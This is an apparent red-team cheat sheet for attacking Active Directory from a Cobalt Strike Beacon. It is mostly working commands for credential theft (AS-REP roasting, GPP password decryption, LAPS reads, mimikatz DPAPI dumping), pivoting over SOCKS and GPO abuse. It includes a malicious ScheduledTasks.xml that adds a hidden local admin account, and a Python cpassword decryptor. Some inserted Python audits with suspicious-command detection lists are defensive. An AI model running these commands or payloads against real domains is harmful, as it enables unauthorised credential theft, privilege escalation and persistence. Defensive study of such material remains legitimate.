more-fun-in-ad.md

File metadata and controls

233 lines (168 loc) · 8.15 KB

More fun in AD

Below is a collection of items to run in a new environment to check for

In addition to BloodHound (Invoke-BloodHound -CollectionMethod All -CompressData -RemoveCSV) and basic net enumeration from Beacon (net view, net computers, net dclist, net domain_trusts), try looking for the following:

Next try running PowerUp:

PowerUp

powershell-import /opt/PowerSploit/Privesc/PowerUp.ps1
powershell Invoke-AllChecks

as well as harmj0y's PowerView tips:

https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

Group functions

Get-NetLocalGroup -ComputerName MX01 -GroupName "Remote Management Users"
Gets the members of the local group whose users can use WinRM on a specific machine.

Get-NetLocalGroup -ComputerName MX01 -GroupName "Remote Desktop Users"
Gets the members of the local group whose users can RDP to a specific machine.

Determine whether Kerberos pre-authentication is disabled for any user (AS-REP roasting)

# With PowerView

# check for users who don't have Kerberos pre-authentication required
Get-DomainUser -PreauthNotRequired
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
# then request their AS-REPs and dump the crackable hashes (Invoke-ASREPRoast is from HarmJ0y's ASREPRoast.ps1, not PowerView)
Invoke-ASREPRoast -Verbose | fl
Setting local admin passwords through Group Policy Preferences was killed by MS14-025 (May 2014), so it is really only relevant to environments built before that; since then LAPS is the standard method.
Still worth checking, because the patch stops new passwords from being set but does not remove existing Groups.xml files from SYSVOL, so old cpassword values linger wherever nobody cleaned up.

#Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
powershell-import /opt/PowerSploit/Exfiltration/Get-GPPPassword.ps1
powershell Get-GPPPassword

https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1


(if working offline from a copied XML file, decrypt the cpassword value with gpp-decrypt)
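To show what Get-GPPPassword and gpp-decrypt actually do to a cpassword value, here is the decryption in Python. This is an added example, not code from the page or from either of those tools. It assumes either pycryptodome or the cryptography package is installed; the AES key is the one Microsoft published for GPP, and the Groups.xml sample is constructed here (its cpassword is generated with the same public key, so it is not any real domain's file).

```python
import base64
import xml.etree.ElementTree as ET

# AES-256 key Microsoft published in the GPP documentation; every cpassword in
# SYSVOL is encrypted with it, which is why the scheme is broken.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)
GPP_IV = b"\x00" * 16  # CBC with an all-zero IV


def _aes_cbc(data: bytes, encrypt: bool) -> bytes:
    """Raw AES-256-CBC with the GPP key; uses pycryptodome if present, else cryptography."""
    try:
        from Crypto.Cipher import AES  # pycryptodome (or legacy pycrypto)
        cipher = AES.new(GPP_AES_KEY, AES.MODE_CBC, GPP_IV)
        return cipher.encrypt(data) if encrypt else cipher.decrypt(data)
    except ImportError:
        from cryptography.hazmat.backends import default_backend
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        cipher = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(GPP_IV), backend=default_backend())
        op = cipher.encryptor() if encrypt else cipher.decryptor()
        return op.update(data) + op.finalize()


def decrypt_cpassword(cpassword: str) -> str:
    """Turn a cpassword attribute value back into the plaintext password."""
    # GPP strips the trailing '=' padding from the base64; restore it first.
    restored = cpassword + "=" * (-len(cpassword) % 4)
    ciphertext = base64.b64decode(restored)
    if not ciphertext or len(ciphertext) % 16:
        raise ValueError("cpassword is not a whole number of AES blocks")
    padded = _aes_cbc(ciphertext, encrypt=False)
    pad = padded[-1]
    if not 1 <= pad <= 16 or padded[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: wrong key or corrupted value")
    return padded[:-pad].decode("utf-16-le")  # passwords are stored as UTF-16LE


def encrypt_cpassword(password: str) -> str:
    """Inverse of decrypt_cpassword; used here only to build the constructed sample."""
    raw = password.encode("utf-16-le")
    pad = 16 - len(raw) % 16
    ciphertext = _aes_cbc(raw + bytes([pad]) * pad, encrypt=True)
    return base64.b64encode(ciphertext).decode().rstrip("=")


def extract_gpp_credentials(xml_text: str) -> list:
    """Walk any GPP XML (Groups.xml, Services.xml, ScheduledTasks.xml, ...) and decrypt every cpassword."""
    results = []
    for elem in ET.fromstring(xml_text.encode("utf-8")).iter():
        cpassword = elem.get("cpassword")
        if not cpassword:  # absent or empty: no password was pushed
            continue
        # Groups.xml uses userName; Services.xml accountName; ScheduledTasks.xml runAs.
        who = elem.get("userName") or elem.get("accountName") or elem.get("runAs") or "?"
        results.append((who, decrypt_cpassword(cpassword)))
    return results


# Constructed sample modelled on a Groups.xml; the clsid/uid GUIDs are placeholders.
_GROUPS_XML_TEMPLATE = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{00000000-0000-0000-0000-000000000000}">
  <User clsid="{00000000-0000-0000-0000-000000000000}" name="LocalAdmin" image="2"
      changed="2013-05-09 11:01:48" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description="" cpassword="__CPASSWORD__"
        changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="LocalAdmin"/>
  </User>
</Groups>
"""
SAMPLE_GROUPS_XML = _GROUPS_XML_TEMPLATE.replace("__CPASSWORD__", encrypt_cpassword("Summer2016!"))

if __name__ == "__main__":
    for account, password in extract_gpp_credentials(SAMPLE_GROUPS_XML):
        print(f"{account}: {password}")
```

Point extract_gpp_credentials at any XML pulled from \\<domain>\SYSVOL\<domain>\Policies\; the padding check is what tells a genuine cpassword apart from some other base64 attribute.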

Note: HarmJ0y maintains great cheat sheets for PowerView, PowerUp, PowerSploit, etc.:

https://github.com/HarmJ0y/CheatSheets

Note: A great tool for generating keyboard-walk wordlists to feed to a cracker like hashcat is kwprocessor:

./kwp -z basechars/full.base keymaps/en.keymap routes/2-to-16-max-3-direction-changes.route > largekwpshift.txt

LAPS:

Note: when these notes were written this access was not collected by BloodHound; newer versions expose it as the ReadLAPSPassword edge.

#Import the script into memory
powershell-import /opt/LAPSToolkit/LAPSToolkit.ps1

#Searches through all OUs to see which AD groups can read the ms-Mcs-AdmPwd attribute
powershell Find-LAPSDelegatedGroups

#Parses through ExtendedRights for each AD computer with LAPS enabled and looks for which group has read access and if any user has "All Extended Rights".
powershell Find-AdmPwdExtendedRights 

#Displays all computers with LAPS enabled, the password expiration, and the password itself if the current user has access
powershell Get-LAPSComputers

https://www.harmj0y.net/blog/powershell/running-laps-with-powerview/

https://www.pentestgeek.com/penetration-testing/another-lap-around-microsoft-laps

Token Notes:

You can create a token from plaintext credentials and use it to reach remote resources even when Beacon is not running in an elevated process. Note that, of the jump methods, only psexec/psexec_psh work with make_token, not winrm or wmi.

make_token .\Administrator P@ssw0rd
ls \\dc01\c$

Credential Manager & DPAPI:

If you assume or know the machine is used for RDP, there may be saved credentials in Credential Manager:

shell vaultcmd /listcreds:"Windows Credentials" /all

These credentials are stored as DPAPI blobs under the user's profile:

powershell Get-ChildItem C:\Users\<User>\AppData\Local\Microsoft\Credentials\ -Force

Use a file name from the listing above to get the blob's details, including the guidMasterKey of the master key that protects it:

mimikatz dpapi::cred /in:C:\Users\<User>\AppData\Local\Microsoft\Credentials\<File Name from above command>

Pull the master keys cached in LSASS (needs SYSTEM, hence the !) and pick the one whose GUID matches:

mimikatz !sekurlsa::dpapi

Decrypt the blob with that master key to obtain the password:

mimikatz dpapi::cred /in:C:\Users\<User>\AppData\Local\Microsoft\Credentials\<File Name from earlier command> /masterkey:<key from above command>

Proxychains & RDP:

beacon> socks 1337

Then on the attacking host add the Beacon SOCKS listener to /etc/proxychains.conf (nano /etc/proxychains.conf):

socks4 127.0.0.1 1337

and tunnel the RDP client through it:

proxychains xfreerdp /u:<username> /v:<IPADDRESS>

GPO Permissions:

https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/

powershell-import /opt/Empire/data/module_source/situational_awareness/network/powerview.ps1

#this outputs the GPOs applied to the WKS01 system
powershell Get-NetGPO -ComputerName WKS01

GPOs can also be viewed in BloodHound now: type the system name in the search field, click the node, then look at its effective inbound GPOs. If one hangs off from the rest, note its GUID and look it up in the output of the PowerShell command above.

#dumps the ACL of every GPO, resolving rights GUIDs to attribute names
powershell Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}

Note the applicable gPCFileSysPath (the GPO's folder under SYSVOL), determine which GPOs you can edit, and possibly upload a malicious ScheduledTasks.xml to Machine\Preferences\ScheduledTasks\ inside that folder. The GPO's version (versionNumber and GPT.ini) and gPCMachineExtensionNames must also be updated or clients will not process the new client-side extension; PowerView's New-GPOImmediateTask handles that for you.

Example Malicious XML

<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks clsid="{XXXXXXX-XXXX-XXXX-XXXX-XXXXXXXX}">
    <ImmediateTaskV5 clsid="{XXXXXXX-XXXX-XXXX-XXXX-XXXXXXXX}" name="OLDGPO" image="0" changed="2016-03-20 12:50:28" uid="{XXXXXXX-XXXX-XXXX-XXXX-XXXXXXXX}" userContext="0" removePolicy="0">
        <Properties action="C" name="OLDGPO" runAs="NT AUTHORITY\System" logonType="S4U">
            <Task version="1.3">
                <RegistrationInfo>
                    <Author>NT AUTHORITY\System</Author>
                    <Description></Description>
                </RegistrationInfo>
                <Principals>
                    <Principal id="Author">
                        <UserId>NT AUTHORITY\System</UserId>
                        <RunLevel>HighestAvailable</RunLevel>
                        <LogonType>S4U</LogonType>
                    </Principal>
                </Principals>
                <Settings>
                    <IdleSettings>
                        <Duration>PT10M</Duration>
                        <WaitTimeout>PT1H</WaitTimeout>
                        <StopOnIdleEnd>true</StopOnIdleEnd>
                        <RestartOnIdle>false</RestartOnIdle>
                    </IdleSettings>
                    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
                    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
                    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
                    <AllowHardTerminate>false</AllowHardTerminate>
                    <StartWhenAvailable>true</StartWhenAvailable>
                    <AllowStartOnDemand>false</AllowStartOnDemand>
                    <Enabled>true</Enabled>
                    <Hidden>true</Hidden>
                    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
                    <Priority>7</Priority>
                    <DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter>
                    <RestartOnFailure>
                        <Interval>PT15M</Interval>
                        <Count>3</Count>
                    </RestartOnFailure>
                </Settings>
                <Actions Context="Author">
                    <Exec>
                        <Command>powershell</Command>
                        <Arguments>-c "net user coolguy P@ssw0rd1234 /add; net localgroup administrators coolguy /add"</Arguments>
                    </Exec>
                </Actions>
                <Triggers>
                    <TimeTrigger>
                        <StartBoundary>%LocalTimeXmlEx%</StartBoundary>
                        <EndBoundary>%LocalTimeXmlEx%</EndBoundary>
                        <Enabled>true</Enabled>
                    </TimeTrigger>
                </Triggers>
            </Task>
        </Properties>
    </ImmediateTaskV5>
</ScheduledTasks>
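The flip side of the XML above is spotting it in SYSVOL. As an added example that is not part of the original page, this Python audit parses a GPP ScheduledTasks.xml and reports the tasks worth a closer look: immediate tasks, tasks running as SYSTEM or with RunLevel HighestAvailable, hidden tasks, and actions containing suspicious commands. The sample XML is constructed from the entry above (trimmed, with placeholder GUIDs, plus a benign task so the filter has something to ignore), and the RISKY_TOKENS list is my own heuristic to tune.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the ImmediateTaskV5 from the example above (trimmed to the elements
# that matter) plus a benign TaskV2. clsid/uid GUIDs are placeholders, not real class IDs.
SAMPLE_SCHEDULEDTASKS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks clsid="{00000000-0000-0000-0000-000000000000}">
  <ImmediateTaskV5 clsid="{00000000-0000-0000-0000-000000000000}" name="OLDGPO" image="0"
      changed="2016-03-20 12:50:28" uid="{00000000-0000-0000-0000-000000000001}"
      userContext="0" removePolicy="0">
    <Properties action="C" name="OLDGPO" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <Principals>
          <Principal id="Author">
            <UserId>NT AUTHORITY\System</UserId>
            <RunLevel>HighestAvailable</RunLevel>
            <LogonType>S4U</LogonType>
          </Principal>
        </Principals>
        <Settings><Hidden>true</Hidden></Settings>
        <Actions Context="Author">
          <Exec>
            <Command>powershell</Command>
            <Arguments>-c "net user coolguy P@ssw0rd1234 /add; net localgroup administrators coolguy /add"</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV5>
  <TaskV2 clsid="{00000000-0000-0000-0000-000000000000}" name="Inventory" image="0"
      changed="2015-01-10 09:00:00" uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="U" name="Inventory" runAs="%LogonDomain%\%LogonUser%" logonType="InteractiveToken">
      <Task version="1.2">
        <Actions Context="Author">
          <Exec><Command>C:\Tools\inventory.exe</Command><Arguments>/quiet</Arguments></Exec>
        </Actions>
      </Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>
"""

ELEVATED_RUNAS = {"nt authority\\system", "system", "nt authority\\localsystem"}
# Substrings that rarely belong in a legitimate GPP task action (heuristic, extend as needed).
RISKY_TOKENS = ("net user", "net localgroup", "powershell", "-enc", "-encodedcommand",
                "rundll32", "regsvr32", "mshta", "certutil", "\\\\")


def audit_scheduled_tasks(xml_text: str) -> list:
    """Return the tasks in a GPP ScheduledTasks.xml that deserve a look, each with its reasons."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    findings = []
    for task in root:  # children are Task, TaskV2, ImmediateTask, ImmediateTaskV5, ...
        props = task.find("Properties")
        if props is None:
            continue
        run_as = props.get("runAs", "")
        run_level = props.findtext("Task/Principals/Principal/RunLevel", "")
        commands = []
        for exe in props.findall("Task/Actions/Exec"):
            cmd = exe.findtext("Command", "")
            args = exe.findtext("Arguments", "")
            commands.append((cmd + " " + args).strip())
        reasons = []
        if task.tag.startswith("ImmediateTask"):
            reasons.append("immediate task: created and run at the next policy refresh, then deleted")
        if run_as.lower() in ELEVATED_RUNAS or run_level == "HighestAvailable":
            reasons.append(f"runs elevated (runAs={run_as!r}, RunLevel={run_level!r})")
        if props.findtext("Task/Settings/Hidden") == "true":
            reasons.append("hidden from the Task Scheduler UI")
        for cmd in commands:
            hits = [t for t in RISKY_TOKENS if t in cmd.lower()]
            if hits:
                reasons.append(f"suspicious action {cmd!r} matched {hits}")
        if reasons:
            findings.append({
                "name": task.get("name", "?"),
                "type": task.tag,
                "changed": task.get("changed", "?"),
                "run_as": run_as,
                "commands": commands,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in audit_scheduled_tasks(SAMPLE_SCHEDULEDTASKS_XML):
        print(f"{f['type']} {f['name']!r} (changed {f['changed']}) as {f['run_as']!r}")
        for r in f["reasons"]:
            print("  -", r)
```

The changed attribute is worth printing because, on a defender's side, a Preferences file whose timestamp does not line up with the GPO's change-control history is the quickest tell; run the function over every ScheduledTasks.xml under SYSVOL\<domain>\Policies\*\Machine\Preferences\ScheduledTasks\.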

Note:

Reading an ACE

ObjectDN - the target of the ACE

IdentityReference - the principal that has rights over ObjectDN

ActiveDirectoryRights - dictates what the IdentityReference can do to ObjectDN
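Putting the ACE fields above together with the GPO permissions section, here is a Python triage of Get-ObjectAcl-style output that picks out the GPOs a non-admin principal can modify. This is an added example, not PowerView's code: the ACE records are constructed dicts shaped like Get-ObjectAcl -ResolveGUIDs output (the GPO DN uses the well-known Default Domain Policy GUID), and the lists of interesting rights, sensitive attributes and expected principals are my assumptions to tune per environment.

```python
# Rights that let the holder change a GPO directly, or take control of it first.
GPO_WRITE_RIGHTS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner", "WriteProperty"}
# Attributes where an attribute-specific WriteProperty is still enough to abuse the GPO
# (repoint gPCFileSysPath, or bump versionNumber/extension names after editing SYSVOL).
GPO_SENSITIVE_ATTRS = {"gPCFileSysPath", "versionNumber",
                       "gPCMachineExtensionNames", "gPCUserExtensionNames"}
# Principals that are supposed to have full control; hidden so the odd ones stand out.
EXPECTED_PRINCIPALS = {"domain admins", "enterprise admins", "administrators", "system",
                       "enterprise domain controllers", "creator owner"}
# ObjectType as shown with -ResolveGUIDs ("All") and without (the null GUID).
ALL_OBJECT_TYPES = {"All", "00000000-0000-0000-0000-000000000000"}

# Constructed ACEs for one GPO, in the shape Get-ObjectAcl -ResolveGUIDs prints them.
GPO_DN = "CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=corp,DC=local"
SAMPLE_ACES = [
    {"ObjectDN": GPO_DN, "IdentityReference": "CORP\\Domain Admins",
     "ActiveDirectoryRights": "GenericAll", "ObjectType": "All", "AccessControlType": "Allow"},
    {"ObjectDN": GPO_DN, "IdentityReference": "NT AUTHORITY\\SYSTEM",
     "ActiveDirectoryRights": "GenericAll", "ObjectType": "All", "AccessControlType": "Allow"},
    {"ObjectDN": GPO_DN, "IdentityReference": "CREATOR OWNER",
     "ActiveDirectoryRights": "GenericAll", "ObjectType": "All", "AccessControlType": "Allow"},
    {"ObjectDN": GPO_DN, "IdentityReference": "NT AUTHORITY\\Authenticated Users",
     "ActiveDirectoryRights": "ReadProperty, GenericExecute", "ObjectType": "All", "AccessControlType": "Allow"},
    {"ObjectDN": GPO_DN, "IdentityReference": "CORP\\Helpdesk",
     "ActiveDirectoryRights": "CreateChild, DeleteChild, ReadProperty, WriteProperty, GenericExecute",
     "ObjectType": "All", "AccessControlType": "Allow"},
    {"ObjectDN": GPO_DN, "IdentityReference": "CORP\\Contractors",
     "ActiveDirectoryRights": "WriteProperty", "ObjectType": "displayName", "AccessControlType": "Allow"},
    {"ObjectDN": GPO_DN, "IdentityReference": "CORP\\gpo-editors",
     "ActiveDirectoryRights": "WriteDacl", "ObjectType": "All", "AccessControlType": "Allow"},
    {"ObjectDN": GPO_DN, "IdentityReference": "CORP\\Interns",
     "ActiveDirectoryRights": "GenericAll", "ObjectType": "All", "AccessControlType": "Deny"},
]


def parse_rights(rights: str) -> set:
    """'CreateChild, DeleteChild, WriteProperty' -> {'CreateChild', 'DeleteChild', 'WriteProperty'}."""
    return {r.strip() for r in rights.split(",") if r.strip()}


def principal_name(identity: str) -> str:
    """'CORP\\Helpdesk' -> 'helpdesk'; 'NT AUTHORITY\\SYSTEM' -> 'system'."""
    return identity.rsplit("\\", 1)[-1].strip().lower()


def triage_gpo_aces(aces: list) -> list:
    """Return the Allow ACEs that give an unexpected principal a way to modify the GPO."""
    hits = []
    for ace in aces:
        # A Deny ACE never grants anything (a Deny that cancels an Allow is not modelled here).
        if ace.get("AccessControlType", "Allow") != "Allow":
            continue
        if principal_name(ace["IdentityReference"]) in EXPECTED_PRINCIPALS:
            continue
        effective = parse_rights(ace["ActiveDirectoryRights"]) & GPO_WRITE_RIGHTS
        obj_type = ace.get("ObjectType", "All")
        if ("WriteProperty" in effective and obj_type not in ALL_OBJECT_TYPES
                and obj_type not in GPO_SENSITIVE_ATTRS):
            effective.discard("WriteProperty")  # write to an unrelated attribute: no GPO edit path
        if effective:
            hits.append({"identity": ace["IdentityReference"], "object": ace["ObjectDN"],
                         "rights": sorted(effective), "object_type": obj_type})
    return hits


if __name__ == "__main__":
    for hit in triage_gpo_aces(SAMPLE_ACES):
        print(f"{hit['identity']} -> {hit['object']}: {', '.join(hit['rights'])} ({hit['object_type']})")
```

CREATOR OWNER is filtered because it is the default inherited entry, not a real principal; it resolves to whoever owns the object, so check the GPO's owner separately, since an owner can always grant themselves WriteDacl.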

Resources:

https://rastamouse.me/2017/08/jumping-network-segregation-with-rdp/

http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/

https://chryzsh.gitbooks.io/darthsidious/content/enumeration/powerview.html